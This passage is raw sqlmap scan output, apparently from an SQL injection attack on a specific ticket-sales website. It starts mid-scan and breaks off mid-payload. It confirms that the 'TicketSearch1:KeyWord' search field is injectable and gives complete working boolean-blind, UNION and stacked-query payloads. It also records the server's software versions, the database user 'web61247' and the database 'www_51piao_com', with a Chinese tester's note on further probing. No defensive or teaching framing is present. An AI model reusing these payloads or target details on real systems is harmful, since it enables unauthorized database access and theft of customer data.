[13:11:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:11:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:12:41] [WARNING] POST parameter 'TicketSearch1:Day2' is not injectable
[13:12:41] [WARNING] POST parameter 'TicketSearch1:Price1' does not appear dynam
ic
[13:12:41] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Price1' might not be injectable
[13:12:41] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Pri
ce1'
[13:12:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:12:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:12:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:12:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:13:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:13:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:13:51] [WARNING] POST parameter 'TicketSearch1:Price1' is not injectable
[13:13:51] [WARNING] POST parameter 'TicketSearch1:Price2' does not appear dynam
ic
[13:13:52] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Price2' might not be injectable
[13:13:52] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Pri
ce2'
[13:13:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:14:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:14:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:14:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:14:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:14:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:15:00] [WARNING] POST parameter 'TicketSearch1:Price2' is not injectable
[13:15:00] [WARNING] GET parameter 'Name' does not appear dynamic
[13:15:00] [WARNING] heuristic (basic) test shows that GET parameter 'Name' migh
t not be injectable
[13:15:00] [INFO] testing for SQL injection on GET parameter 'Name'
[13:15:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:15:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:15:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:15:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:15:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:15:25] [INFO] GET parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[13:15:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:15:45] [INFO] checking if the injection point on GET parameter 'Name' is a f
alse positive
[13:15:46] [WARNING] false positive or unexploitable injection point detected
[13:15:46] [WARNING] GET parameter 'Name' is not injectable
[13:15:46] [WARNING] GET parameter 'Source' does not appear dynamic
[13:15:46] [WARNING] heuristic (basic) test shows that GET parameter 'Source' mi
ght not be injectable
[13:15:46] [INFO] testing for SQL injection on GET parameter 'Source'
[13:15:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:15:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:16:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:16:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:16:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:16:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:17:00] [WARNING] GET parameter 'Source' is not injectable
[13:17:00] [WARNING] GET parameter 'tickettypeid' does not appear dynamic
[13:17:01] [WARNING] heuristic (basic) test shows that GET parameter 'tickettype
id' might not be injectable
[13:17:01] [INFO] testing for SQL injection on GET parameter 'tickettypeid'
[13:17:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:17:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:17:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:17:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:17:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:17:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:18:25] [WARNING] GET parameter 'tickettypeid' is not injectable
[13:18:25] [WARNING] GET parameter 'ticketdays' does not appear dynamic
[13:18:26] [WARNING] heuristic (basic) test shows that GET parameter 'ticketdays
' might not be injectable
[13:18:26] [INFO] testing for SQL injection on GET parameter 'ticketdays'
[13:18:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:18:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:18:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:18:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:18:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:18:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:19:39] [WARNING] GET parameter 'ticketdays' is not injectable
[13:19:39] [WARNING] GET parameter 'ticketaddrid' does not appear dynamic
[13:19:40] [WARNING] heuristic (basic) test shows that GET parameter 'ticketaddr
id' might not be injectable
[13:19:40] [INFO] testing for SQL injection on GET parameter 'ticketaddrid'
[13:19:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:19:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:19:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:19:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:20:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:20:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:20:55] [WARNING] GET parameter 'ticketaddrid' is not injectable
sqlmap identified the following injection points with a total of 1092 HTTP(s) re
quests:
---
Place: POST
Parameter: TicketSearch1:KeyWord
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=dDwzOTI0MzMwMDQ7dDw7bDxpPDE+Oz47bDx0PDtsPGk8MD47PjtsPHQ
8O2w8aTwwPjtpPDE+O2k8ND47aTw1PjtpPDk+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTw5Pjs
+PjtsPGk8MD47aTwxPjtpPDI+O2k8Mz47aTw0PjtpPDU+O2k8Nj47aTw3PjtpPDg+Oz47bDx0PDtsPGk
8MD47PjtsPHQ8QDwxO+a8lOWUseS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDI76K+d5Ymn5q2
M5YmnOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTvoiJ7ouYjoiq3olb47Pjs7Pjs+Pjt0PDtsPGk
8MD47PjtsPHQ8QDwzO+mfs+S5kOS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+aIj+WJp+e
7vOiJujs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDQ4O+WEv+erpeS6suWtkDs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDU3O+eUn+a0u+acjeWKoTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDk755S
15b2x5L2T6IKyOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTM75p2C5oqA6a2U5pyvOz47Oz47Pj4
7Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDxpPDA+O2k8MT47aTwyPjtpPDM+O2k8ND4
7PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPDE75LuK5aSpOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8Mzv
kuInlpKnlhoU7Pjs7Pjs+Pjt0PDtsPGk8MD47PjtsPHQ8QDw3O+S4gOWRqOWGhTs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDE0O+S6jOWRqOWGhTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+S4gOS
4quaciOWGhTs+Ozs+Oz4+Oz4+O3Q8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDEwPjs+Pjs7Pjt0PHA8bDx
fIUl0ZW1Db3VudDs+O2w8aTwyPjs+PjtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PEA8c2V
sX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHlwZWl
kPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0mbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcml
jZTI9JmRheTE9JmRheTI9O+WMl+S6rDs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xNTcmdGlja2V0YWRkcmlkPSZ0aWNrZXR0eXBlaWQ9JnRpY2t
ldGRheXM9JnRpY2tldHByaWNlPSZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWNlMj0mZGF
5MT0mZGF5Mj075LiK5rW3Oz47Oz47Pj47Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDx
pPDA+O2k8MT47aTwyPjtpPDM+O2k8ND47PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g7VGl
ja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V0ZGF
5cz0mdGlja2V0cHJpY2U9MCwxMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9JmR
heTE9JmRheTI9OzEwMOWFg+S7peS4izs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V
0ZGF5cz0mdGlja2V0cHJpY2U9MTAxLDMwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWN
lMj0mZGF5MT0mZGF5Mj07MTAxLTMwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWF
yY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGl
ja2V0ZGF5cz0mdGlja2V0cHJpY2U9MzAxLDUwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnB
yaWNlMj0mZGF5MT0mZGF5Mj07MzAxLTUwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9
zZWFyY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0
mdGlja2V0ZGF5cz0mdGlja2V0cHJpY2U9NTAxLDEwMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2U
xPSZwcmljZTI9JmRheTE9JmRheTI9OzUwMS0xMDAw5YWDOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA
8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHl
wZWlkPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0xMDAwJm5hbWU9MTImc3R5bGU9JnNvcnQ9JnByaWN
lMT0mcHJpY2UyPSZkYXkxPSZkYXkyPTsxMDAw5YWD5Lul5LiKOz47Oz47Pj47Pj47Pj47Pj47Pj47Pg=
=&TicketSearch1:KeyWord=12%' AND 9386=9386 AND '%'='&TicketSearch1:BtnSearchKey=
%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=
&TicketSearch1:Price2=
---
[13:20:55] [INFO] testing Microsoft SQL Server
[13:20:55] [INFO] confirming Microsoft SQL Server
[13:20:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[13:20:55] [INFO] fetching current user
[13:20:55] [INFO] retrieving the length of query output
[13:20:55] [INFO] resumed: 8
[13:20:55] [INFO] resumed: web61247
current user:    'web61247'
[13:20:55] [INFO] fetching current database
[13:20:55] [INFO] retrieving the length of query output
[13:20:55] [INFO] resumed: 14
[13:20:55] [INFO] resumed: www_51piao_com
current database:    'www_51piao_com'
[13:20:55] [INFO] testing if current user is DBA
[13:20:56] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
添加--level 3进行测试没有测试出来name和ticketaddrid
sqlmap identified the following injection points with a total of 4519 HTTP(s) re
quests:
---
Place: POST
Parameter: TicketSearch1:KeyWord
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=dDwzOTI0MzMwMDQ7dDw7bDxpPDE+Oz47bDx0PDtsPGk8MD47PjtsPHQ
8O2w8aTwwPjtpPDE+O2k8ND47aTw1PjtpPDk+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTw5Pjs
+PjtsPGk8MD47aTwxPjtpPDI+O2k8Mz47aTw0PjtpPDU+O2k8Nj47aTw3PjtpPDg+Oz47bDx0PDtsPGk
8MD47PjtsPHQ8QDwxO+a8lOWUseS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDI76K+d5Ymn5q2
M5YmnOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTvoiJ7ouYjoiq3olb47Pjs7Pjs+Pjt0PDtsPGk
8MD47PjtsPHQ8QDwzO+mfs+S5kOS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+aIj+WJp+e
7vOiJujs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDQ4O+WEv+erpeS6suWtkDs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDU3O+eUn+a0u+acjeWKoTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDk755S
15b2x5L2T6IKyOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTM75p2C5oqA6a2U5pyvOz47Oz47Pj4
7Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDxpPDA+O2k8MT47aTwyPjtpPDM+O2k8ND4
7PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPDE75LuK5aSpOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8Mzv
kuInlpKnlhoU7Pjs7Pjs+Pjt0PDtsPGk8MD47PjtsPHQ8QDw3O+S4gOWRqOWGhTs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDE0O+S6jOWRqOWGhTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+S4gOS
4quaciOWGhTs+Ozs+Oz4+Oz4+O3Q8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDEwPjs+Pjs7Pjt0PHA8bDx
fIUl0ZW1Db3VudDs+O2w8aTwyPjs+PjtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PEA8c2V
sX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHlwZWl
kPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0mbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcml
jZTI9JmRheTE9JmRheTI9O+WMl+S6rDs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xNTcmdGlja2V0YWRkcmlkPSZ0aWNrZXR0eXBlaWQ9JnRpY2t
ldGRheXM9JnRpY2tldHByaWNlPSZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWNlMj0mZGF
5MT0mZGF5Mj075LiK5rW3Oz47Oz47Pj47Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDx
pPDA+O2k8MT47aTwyPjtpPDM+O2k8ND47PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g7VGl
ja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V0ZGF
5cz0mdGlja2V0cHJpY2U9MCwxMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9JmR
heTE9JmRheTI9OzEwMOWFg+S7peS4izs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V
0ZGF5cz0mdGlja2V0cHJpY2U9MTAxLDMwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWN
lMj0mZGF5MT0mZGF5Mj07MTAxLTMwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWF
yY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGl
ja2V0ZGF5cz0mdGlja2V0cHJpY2U9MzAxLDUwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnB
yaWNlMj0mZGF5MT0mZGF5Mj07MzAxLTUwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9
zZWFyY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0
mdGlja2V0ZGF5cz0mdGlja2V0cHJpY2U9NTAxLDEwMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2U
xPSZwcmljZTI9JmRheTE9JmRheTI9OzUwMS0xMDAw5YWDOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA
8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHl
wZWlkPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0xMDAwJm5hbWU9MTImc3R5bGU9JnNvcnQ9JnByaWN
lMT0mcHJpY2UyPSZkYXkxPSZkYXkyPTsxMDAw5YWD5Lul5LiKOz47Oz47Pj47Pj47Pj47Pj47Pj47Pg=
=&TicketSearch1:KeyWord=12%') AND 9259=9259 AND ('%'='&TicketSearch1:BtnSearchKe
y=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price
1=&TicketSearch1:Price2=
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __VIEWSTATE=dDwzOTI0MzMwMDQ7dDw7bDxpPDE+Oz47bDx0PDtsPGk8MD47PjtsPHQ
8O2w8aTwwPjtpPDE+O2k8ND47aTw1PjtpPDk+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTw5Pjs
+PjtsPGk8MD47aTwxPjtpPDI+O2k8Mz47aTw0PjtpPDU+O2k8Nj47aTw3PjtpPDg+Oz47bDx0PDtsPGk
8MD47PjtsPHQ8QDwxO+a8lOWUseS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDI76K+d5Ymn5q2
M5YmnOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTvoiJ7ouYjoiq3olb47Pjs7Pjs+Pjt0PDtsPGk
8MD47PjtsPHQ8QDwzO+mfs+S5kOS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+aIj+WJp+e
7vOiJujs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDQ4O+WEv+erpeS6suWtkDs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDU3O+eUn+a0u+acjeWKoTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDk755S
15b2x5L2T6IKyOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTM75p2C5oqA6a2U5pyvOz47Oz47Pj4
7Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDxpPDA+O2k8MT47aTwyPjtpPDM+O2k8ND4
7PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPDE75LuK5aSpOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8Mzv
kuInlpKnlhoU7Pjs7Pjs+Pjt0PDtsPGk8MD47PjtsPHQ8QDw3O+S4gOWRqOWGhTs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDE0O+S6jOWRqOWGhTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+S4gOS
4quaciOWGhTs+Ozs+Oz4+Oz4+O3Q8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDEwPjs+Pjs7Pjt0PHA8bDx
fIUl0ZW1Db3VudDs+O2w8aTwyPjs+PjtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PEA8c2V
sX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHlwZWl
kPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0mbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcml
jZTI9JmRheTE9JmRheTI9O+WMl+S6rDs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xNTcmdGlja2V0YWRkcmlkPSZ0aWNrZXR0eXBlaWQ9JnRpY2t
ldGRheXM9JnRpY2tldHByaWNlPSZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWNlMj0mZGF
5MT0mZGF5Mj075LiK5rW3Oz47Oz47Pj47Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDx
pPDA+O2k8MT47aTwyPjtpPDM+O2k8ND47PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g7VGl
ja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V0ZGF
5cz0mdGlja2V0cHJpY2U9MCwxMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9JmR
heTE9JmRheTI9OzEwMOWFg+S7peS4izs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V
0ZGF5cz0mdGlja2V0cHJpY2U9MTAxLDMwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWN
lMj0mZGF5MT0mZGF5Mj07MTAxLTMwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWF
yY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGl
ja2V0ZGF5cz0mdGlja2V0cHJpY2U9MzAxLDUwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnB
yaWNlMj0mZGF5MT0mZGF5Mj07MzAxLTUwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9
zZWFyY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0
mdGlja2V0ZGF5cz0mdGlja2V0cHJpY2U9NTAxLDEwMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2U
xPSZwcmljZTI9JmRheTE9JmRheTI9OzUwMS0xMDAw5YWDOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA
8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHl
wZWlkPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0xMDAwJm5hbWU9MTImc3R5bGU9JnNvcnQ9JnByaWN
lMT0mcHJpY2UyPSZkYXkxPSZkYXkyPTsxMDAw5YWD5Lul5LiKOz47Oz47Pj47Pj47Pj47Pj47Pj47Pg=
=&TicketSearch1:KeyWord=-3186%') UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(115)+
CHAR(118)+CHAR(113)+CHAR(107)+CHAR(75)+CHAR(84)+CHAR(81)+CHAR(76)+CHAR(84)+CHAR(
119)+CHAR(104)+CHAR(98)+CHAR(85)+CHAR(113)+CHAR(104)+CHAR(119)+CHAR(112)+CHAR(11
3)-- &TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSe
arch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=dDwzOTI0MzMwMDQ7dDw7bDxpPDE+Oz47bDx0PDtsPGk8MD47PjtsPHQ
8O2w8aTwwPjtpPDE+O2k8ND47aTw1PjtpPDk+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTw5Pjs
+PjtsPGk8MD47aTwxPjtpPDI+O2k8Mz47aTw0PjtpPDU+O2k8Nj47aTw3PjtpPDg+Oz47bDx0PDtsPGk
8MD47PjtsPHQ8QDwxO+a8lOWUseS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDI76K+d5Ymn5q2
M5YmnOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTvoiJ7ouYjoiq3olb47Pjs7Pjs+Pjt0PDtsPGk
8MD47PjtsPHQ8QDwzO+mfs+S5kOS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+aIj+WJp+e
7vOiJujs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDQ4O+WEv+erpeS6suWtkDs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDU3O+eUn+a0u+acjeWKoTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDk755S
15b2x5L2T6IKyOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTM75p2C5oqA6a2U5pyvOz47Oz47Pj4
7Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDxpPDA+O2k8MT47aTwyPjtpPDM+O2k8ND4
7PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPDE75LuK5aSpOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8Mzv
kuInlpKnlhoU7Pjs7Pjs+Pjt0PDtsPGk8MD47PjtsPHQ8QDw3O+S4gOWRqOWGhTs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDE0O+S6jOWRqOWGhTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+S4gOS
4quaciOWGhTs+Ozs+Oz4+Oz4+O3Q8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDEwPjs+Pjs7Pjt0PHA8bDx
fIUl0ZW1Db3VudDs+O2w8aTwyPjs+PjtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PEA8c2V
sX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHlwZWl
kPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0mbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcml
jZTI9JmRheTE9JmRheTI9O+WMl+S6rDs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xNTcmdGlja2V0YWRkcmlkPSZ0aWNrZXR0eXBlaWQ9JnRpY2t
ldGRheXM9JnRpY2tldHByaWNlPSZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWNlMj0mZGF
5MT0mZGF5Mj075LiK5rW3Oz47Oz47Pj47Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDx
